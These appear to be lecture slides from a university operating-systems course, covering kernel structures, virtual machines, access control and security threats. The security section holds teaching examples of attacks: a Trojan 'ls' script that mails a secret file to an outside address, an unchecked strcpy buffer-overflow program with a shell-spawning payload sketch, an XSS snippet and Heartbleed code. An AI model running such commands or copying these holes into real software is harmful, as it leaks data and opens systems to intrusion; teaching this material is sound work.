TDDB68 Concurrent Programming and
Operating Systems
Lecture 9:
OS Structures, VMs and Security
Mikael Asplund, Senior Lecturer
Real-time Systems Laboratory
Department of Computer and Information Science
Copyright Notice:
Thanks to Christoph Kessler for much of the material behind these slides.
The lecture notes are partly based on Silberschatz’s, Galvin’s and Gagne’s book (“Operating System Concepts”, 7th ed., Wiley, 2005). No part of
the lecture notes may be reproduced in any form, due to the copyrights reserved by Wiley. These lecture notes should only be used for internal
teaching purposes at the Linköping University.
Today's lecture
●
OS structures
●
Virtualization
●
Protection
●
Security
Operating System Structures
●
How to manage OS complexity?
–
Divide-and-conquer!
–
Decompose into smaller components
with well-defined interfaces and dependences
●
Layered Approach
●
Microkernels
●
Modules
●
Virtual Machines
Simple Structure (MSDOS)
Layered Approach
●
●
The operating system is divided
into a number of layers (levels,
rings), each built on top of lower
layers.
Functions in layer i call only
functions/services in layers < i
(strict layering: only in i or i-1)
System and application programs
UNIX System Structure: 3 Layers
Problems of the layered approach
●
●
Cyclic dependences between different OS
components
Less efficient
–
●
Long call chains (e.g. I/O) down to system calls,
possibly with parameter copying/modification at
several levels
Compromise solution: Have few layers
Microkernel System Structure
●
“Lean kernel”: Moves as much service
functionality as possible from the kernel into
“user” space
–
●
●
Kernel: Minimal process and memory
management; IPC
Communication between user modules by
message passing
Example: Mach kernel, used e.g. in Tru64
Unix or Mac OS-X
Microkernel Pros and Cons
●
Benefits:
–
–
–
–
●
Easier to extend a microkernel
Easier to port the operating system to new architectures
More reliable (less code is running in kernel mode)
More secure
Detriments:
–
Performance overhead of user space to kernel space
communication
Modules
●
●
Most modern operating systems implement kernel
modules
Component-based approach:
–
–
–
●
Each core component is separate
Each talks to the others over known interfaces
Each is loadable as needed within the kernel
Overall, similar to layers
but more flexible
Example: Solaris
Example: Mac-OS X ”Darwin”
●
Hybrid structure: Layering + Microkernel +
Modules
Application environments,
common services, GUI services
BSD Unix kernel:
Command-line interface, networking,
file system support, POSIX implem.
Mach Microkernel:
Memory mgmt, thread scheduling, IPC, RPC
Kernel
extensions:
device drivers,
dynamically
loadable modules
Virtual Machines
Virtual Machines
guest
OS
Non-virtual Machine
Virtual Machine
Monitor (VMM),
Hypervisor
(a) Nonvirtual machine
(b) Virtual machines
Virtual Machine
Virtual Machine Examples
●
●
●
Multitasking OS creates the illusion that each process executes on its own
(virtual) processor with its own (virtual) memory.
qemu (used in Pintos labs) simulates x86 hardware
The Java VM simulates an abstract computer that executes Java
bytecode.
VM Advantages
●
Complete protection of system resources
since each virtual machine is isolated from all other virtual machines.
●
Perfect vehicle for operating-systems research, development, teaching
●
Portability across multiple platforms (host OS, hardware)
●
–
Java VM
–
Legacy binary codes for obsolete hardware still operational
Saves appl.-server hardware costs if clients demand a private system
–
”Most servers today run at <15% utilization, TCO ~10k$/yr/server” [Xen]
VM Disadvantages
●
Permits no direct sharing of resources.
●
Difficult to implement
–
●
to provide an exact duplicate to the underlying machine
Overhead (performance penalty)
Virtualization technology overview
Traditional virtualization:
Virt. machine/Emulation
Lightweight virtualization:
Paravirtualization
Lightweight virtualization:
OS-level virtualization
Hardware
virtualization
Emulates real or fictitious
hardware
”Almost” same hardware
(barring speed and size)
Virtualization done by the
host OS
Guest HW
!= host HW
+ guest HW != host HW
possible
+ different host and guest
OSs possible
No VMM
+ diff. guest OSs possible
- VMM needed
+ guest OS is not aware
of the host OS beneath
- guest OS to be rewritten
to be VMM-aware
(fix privileged
instructions)
On-the-fly
instruction
translation in
hardware
- VMM needed to dispatch virtual kernel
mode privileged
instructions
- translation overhead
- still overhead
 # of VMs limited
VM/370 (IBM), VMware,
Xen
Bochs, QEMU, Parallels,
UML
Microsoft Virtual Server,
Denali
Java JVM, C#/.NET CLR
Guest OS = Host OS
(and same HW)
+ Multiple instances of
same OS possible
+ Low overhead
+ Can scale up to
hundreds of VMs
(binary
translation)
+ Fast
- Only one OS
e.g. for virtual private
servers
(NB - different
goal)
Solaris 10 ”Zones”
(Containers),
OpenVZ, Virtuozzo, LinuxVServer,
FreeBSD-Jails
Transmeta
Crusoe
processor
(x86 on VLIW
- more power
efficient)
Paravirtualization Example: Xen
Control
Plane
Software
User
software
User
software
User
software
Guest OS
(XenoLinux)
Guest OS
(XenoLinux)
Guest OS
(XenoBSD)
Guest OS
(XenoXP)
Xeno-Aware
Device Drivers
Xeno-Aware
Device Drivers
Xeno-Aware
Device Drivers
Domain0
control
interface
Virtual
x86
CPU
Virtu Virtual
physical
al
MMU memory
Virtual
network
Xeno-Aware
Device Drivers
Virtual
blockdevice
s
XEN
hyper
visor
Hardware (SMP x86, MMU, physical memory, network access, SCSI/IDE)
Adapted from: P. Barham et al.: Xen and the Art of
Virtualization. Proc. SOSP 2003
virtualized
OS-Level Virtualization Example:
Solaris 10 Containers (”Zones”)
User programs
System programs
CPU resources
Memory resources
Global zone
User programs
System programs
Network addresses
Device access
CPU resources
Memory resources
User programs
System programs
Network addresses
Device access
CPU resources
Memory resources
Zone 1
Zone 2
Virtual platform
Device management
Zone Management
Solaris Kernel
Network addresses
Devices
The Java Virtual Machine
Possibly untrusted
applets from
internet
JVM
All accesses to
system resources
mediated by JVM
 ”Sandbox”
Hardware support for virtualization
●
●
Simulate mode bit, system call effects, … in
software???
Second hardware mode bit in status register
–
Physical mode bit used only by VMM / host kernel
●
–
Virtual machine incl. guest OS
runs in physical user mode
Virtual mode bit used by guest OS
●
Virtual kernel mode vs virtual user mode
Summary: Operating System
Structures
●
How to manage OS complexity?
–
Divide-and-conquer!
–
Decompose into smaller components
with well-defined interfaces and dependences
●
Layered Approach
●
Microkernels
●
Modules
●
Virtual Machines
–
Traditional Virtualization
–
Light-Weight Virtualization
(Paravirtualization, OS-level virtualization)
Protection and Security
Protection vs. Security
●
●
Protection
= the mechanisms that can be used to control
access to various resources
Security
= a measure of confidence that the
integrity of a system and its data
will be preserved…
Mechanism:
House with door
Policy: Keep the
door locked
Protection and Security
Protection (Chapter 14)
●
●
●
●
Goals of Protection
Domain of Protection
Access Matrix
Implementation of Access
Matrix
●
Revocation of Access Rights
●
Capability-Based Systems
●
Language-Based Protection
Security (Chapter 15)
 The Security Problem
 Authentication
 Program Threats
 System Threats
 Encryption (briefly)
Principle of least privilege:
Programs, users and systems should be given
just enough privileges to perform their tasks
Domain Structure
●
●
Access-right = <object-name, rights-set>
where rights-set is a subset of all valid operations
that can be performed on the object.
Domain = set of access-rights
Domain Implementation
●
Standard dual-mode system consists of 2
domains:
–
–
●
User
Supervisor
Insufficient for multi-user systems
Unix example
●
Domain = user-id (one for each user)
●
Domain switch accomplished via file system.
–
–
Each file has associated with it a domain bit
(setuid bit).
When file is executed and setuid == on,
then user-id is set to owner of the file being
executed. When execution completes, user-id is
reset.
ll /bin:
...
28 -r-s--x--x
...
1 root
lp
28092 Jan 23
2005 lp*
Access Matrix
●
View protection as a matrix (access matrix)
–
Rows represent domains that a process can
belong to
–
Columns represent objects that can be operated
upon
–
Access(i, j) = set of operations that a process
executing in domain Di an invoke on object Fj
Access Matrix
Access Matrix (2)
●
Access matrix design separates mechanism and
policy:
–
Mechanism:
●
●
–
OS provides access matrix
OS ensures that the matrix is only manipulated by authorized
agents
Policy:
●
User dictates policy,
i.e., she fills in the access matrix,
specifying who can access what object and in what mode.
Implementation of Access Matrix
●
Each column = Access-control list
for one object.
Defines who can perform what
operation.
Domain 1 = Read, Write
Domain 2 = Read
Domain 3 = Read

●
Each row = Capability List (like a key)
For each domain, what operations are
allowed on what objects to a process in
the domain.
Object 1 – Read
Object 4 – Read, Write, Execute
Object 5 – Read, Write, Delete, Copy
Unix:
Each file has r-w-x bits
for the three domains:
+ owner
+ group
+ other users
Nowadays it also has
additional access lists
for arbitrary users.
Win2K, XP: similar
UNIX file descriptor / Win file handle
with its pointer to system-wide open file
table entry is a capability.
Pros and Cons
Capability lists:
●
Simpler run-time behavior – process has all information
●
Harder to revoke access rights
–
There may be many processes out there with capabilities that we
must search for…
Access control lists:
●
Corresponds to the needs of individual users/processes
●
Simple to revoke access rights for individual objects
●
System-wide overview is difficult – information is spread out
–
●
What access rights does process P have?
Overhead – ACL must be searched for every access to
object
A combination is often used…
Example: Unix file access
●
●
Access lists determine if a file may be opened
The open method returns a file handle held by the
process
–
The file handle is a capability – a proof that the
process may operate on that file, …
●
but only in a way as specified when obtaining the handle –
which must still be checked at every access!
(Information) Security:
A condition that results from the establishment
and maintenance of protective measures that
enable an enterprise to perform its mission or
critical functions despite risks posed by threats to
its use of information systems.
[NIST]
Security Attributes
●
●
●
Confidentiality - the absence of unauthorized
disclosure of information
Integrity - absence of improper system
alterations
Availability - readiness for correct service
Threats against security
●
●
Vulnerability - A weakness in a system,
application, or network that is subject to
exploitation or misuse.
Attack - Any kind of malicious activity that
attempts to collect, disrupt, deny, degrade, or
destroy information system resources or the
information itself.
40
41
Security Concerns
 Physical
–
the room/building/site must lock out intruders
 Humans –
are they all trustworthy?
 Network –
what happens on the wire? Break-in? Denial-of-service?
 Operating System –
protect itself from mishaps and mis-usage
Easier to protect against accidental usage
than against malicious misuse.
OS perspective
●
Authentication
●
Malware
Authentication
Authentication
●
●
●
Crucial to identify user correctly,
as protection systems depend on user ID
User identity most often established through
passwords
Passwords may also either be encrypted or
allowed to be used only once
10 most common passwords 2016:
1) 123456
2) password
3) 12345678
4) qwerty
5) 12345
6) 123456789
7) football
8) 1234
9) 1234567
10) baseball
46
Authentication
●
Unix: Passwords are kept in files
–
●
Each password is encrypted with a one-way crypto + a ”salt”
–
●
●
earlier /etc/passwd, now separate file e.g. /etc/master.passwd or /etc/shadow
salt configures the en-/decryption algorithm  extends the password
To verify a password:
–
Lookup the salt for the user
–
Encrypt the submitted password
–
Compare result with what is stored
Attack: Steal the password file, generate passwords brute
force, or use a dictionary...
–
For a long time only 8 chars of the password were used!
Authentication
●
Unix has shaped up
●
Still a major problem
●
–
Yahoo
–
LinkedIn
–
Dropbox
–
...
https://haveibeenpwned.com/
New golden standard:
Multi-factor authentication
Malware
Classification of Malware
Malicious programs
Program Threats
(need host program)
Trapdoor
(back
door)
Logic
bomb
System Threats
(independent)
Trojan Buffer
Horse overflow
attack
Virus
Worm
replicating
PATH
attack
Fakelogin
attack
Spyware
e.g. keylogger
Zombie
(hidden, remotely
controlled submachine
used e.g. for spam
distribution, denial-ofservice attacks)
Program Threats
●
Trojan Horse
●
Trap Door / Back Door
●
Logic Bomb
●
Stack and Buffer Overflow
●
Virus
Trojan Horse
●
●
Innocent-looking code segment
that misuses its environment.
Exploits mechanisms for allowing programs
written by users to be executed by other users.
NEVER download a “funny game”
from some site, unless you know
and trust the person who wrote it
( the person making it available)
Trojan horse example: PATH
attack
●
Consider your UNIX search path:
–
●
% echo $PATH
e.g., PATH = .:/usr/local/bin:/sw/tex/bin:/home/me/bin
Do you possibly have a globally writeable (or other
user’s) directory in your search path?
–
–
–
–
e.g., /home/me/tmp
Attacker stores there an executable file called ”ls”
Eventually you are in /home/me/tmp (i.e., ”.”) and say ”ls”
Or, you are in another user’s directory (i.e., in ”.”) ....
#!/bin/sh
rm /home/me/tmp/ls
cat /home/me/secret.txt | mail [email protected]
/usr/bin/ls
HTML cross scripting
Do you read HTML-formatted entries on a public
bulletin board?
Don’t! (…unless you know it has been
filtered!)
it may contain Javascript ...
<a onHover=“runCode();false;”>…</a>
…that will get executed when you happen to slide
the mouse over that area
Back door / Trap door
●
●
●
Specific user identifier or password that
circumvents normal security procedures.
Could be included in a compiler.
Playing internet games? Ever been asked to
“download and install” something to continue
playing…? DON’T!
Such programs may:
–
Open up a back door for other attacks
–
Join your computer in a stealthy net of proxies…
…to be used later
–
...
Bufer overflow
Because in C an array is just a pointer...
Recall
Usual run-time stack with
procedure activation
record, for main() call:
buffer
C Program with Buffer-Overflow Vulnerability
#include <stdio.h>
#define BUFFER_SIZE 256
int main ( int argc, char *argv[] )
{
char buffer[BUFFER_SIZE];
if (argc < 2)
return -1;
else {
strcpy(buffer,argv[1]);
return 0;
}
}
Buffer Overflow Attack – Modified Shell Code
#include <stdio.h>
int main(int argc, char *argv[])
{
execvp(“\bin\sh”, “\bin\sh”, NULL);
return 0;
An exploit of
the buffer
overflow
vulnerability
above
}
Compile this and obtain executable:
a12f341dc76752ffe096c2…d092e4
Write this as an ASCII string with same bit pattern:
”$s¤E7\223 T+%yr1!...”,
append the right number of NOPs, guess the right start address, append it too,
and pass this string as parameter to the service of the previous slide…
Buffer Overflow Attack – Effect on Stack Frame
Before copying
After copying of modified
shell code in parameter into
buffer
execvp(…) call creates a shell process that
runs with same privileges as the attacked
program!
Buffer over-read example:
Heartbleed
62
Secure connections
●
●
Cryptographic mechanisms to ensure
–
Confidentiality
–
Integrity
Standard protocol: TLS/SSL
63
Heartbeat in SSL
●
Mobile devices can suddenly lose connectivity
●
When to abort a partial transaction?
●
Use heartbeats to check wether the other party is still there.
●
Computer A:
–
●
Still there? Here is a 20-char message:
“ABCDEFGHIJKLMNOPQRST”
Computer B:
–
I', still here! You sent a 20-char message:
“ABCDEFGHIJKLMNOPQRST”
64
Heartbleed
●
Computer A:
–
●
Dator B:
–
●
Still there? Here is a 20-char message: “A”
I'm still here! You sent a 20-char message:
“A##HEMLIGT##HEMLIGT##”
From the source code of OpenSSL
–
buffer = OPENSSL_malloc(1 + 2 + payload + padding);
–
bp = buffer;
–
memcpy(bp, pl, payload);
(pl is pointer to the real message, payload is the given length, bp is a
pointer to the message that will be sent)
65
Heartbleed
●
Missing buffer overread bound check in SSL heartbeat code
●
In use since 2011, detected and fixed 2014
–
●
Vulnerable versions with all likelihood still out there
Attacker can steal up to 64KB of subsequent memory contents
–
Which might contain confidential data, user names and
passwords, credit card info, session IDs, private keys, …
●
–
●
Possibly belonging to a different (unrelated) process
Undetectable – no one knows how much has leaked out
Rated at severity level 11 (catastrophic) on a scale of 1..10
Ref.: B. Chandra: A technical view at the OpenSSL Heartbleed vulnerability, IBM
Protection againts Buffer Overflow Vulnerabilities
Hardware protection
●
Strict separation of program and data memory sections
–
Recent SUN SPARC processors and Solaris versions:
●
–
no execution of code located in a stack section
(segmentation violation)
Recent AMD / Intel x86, for Linux and Windows XP SP2:
●
NX bit in page table marks page as non-executable
Language and System software protection
●
use a tool for automatic bound checking, e.g. Electric
Fence
●
use a language with built-in bound checks, e.g. Java
Application-level protection (Programmer’s responsibility)
●
use strncpy(buffer, argv[1], sizeof(buffer)-1); instead
Program Threats: Viruses
●
Virus
–
–
–
–
Code fragment embedded in legitimate program
Very specific to CPU architecture, operating system,
applications – mainly affect microcomputer systems
Downloading viral programs from public bulletin boards
or exchanging floppy disks etc. containing an infection.
Usually borne via email (attachment) or as a macro
●
Visual Basic Macro to reformat hard drive
System and Network Threats
●
●
Target: abuse of services and network
connections
Attacks more effective and harder to counter if
multiple networked systems are involved
Worms
●
●
Worm = process that uses the spawn mechanism to ravage system
performance
–
standalone program
–
Reproduces itself via network links, e.g. Email
–
Often (erroneously) called ”virus”
Most “worms” need a non-critical user
–
e.g. spam mails – “New bug found by MS – install this patch now!”
… Microsoft NEVER submits updates via e-mail!
The Morris Internet Worm (1988)
• Exploiting buffer-overflow vulnerability in finger daemon with a 536 byte parameter…
• Exploiting rsh feature of easy remote login without password control
• Exploiting nondisabled debug option (for showing status) vulnerability in sendmail
“But why should they target my computer?
I don’t have anything valuable or secret there...”
A Denial of Service (DoS) attack is
measured in gigabits per second (Gbps)
73
50Gpbs attack:
74
In 2016 a 620Gps was lauched against a
security blog
75
Where did the traffic come from?
76
77
78
Threat Monitoring
●
●
●
Check for suspicious patterns of activity – i.e., several
incorrect password attempts may signal password guessing.
Audit log – records the time, user, and type of all accesses to
an object; useful for recovery from a violation and developing
better security measures.
Threat monitoring - Scan the system periodically for security
holes; done when the computer is relatively unused.
What's next?
●
Lab deadline March 10th
●
Exam March 18th
Want to know more?
●
●
Follow-up courses:
–
Real-time Systems
–
Distributed Systems
–
Computer Security
–
Programming of Parallel Computers - Methods and Tools
–
Compiler Construction
–
...
Master thesis project in year 5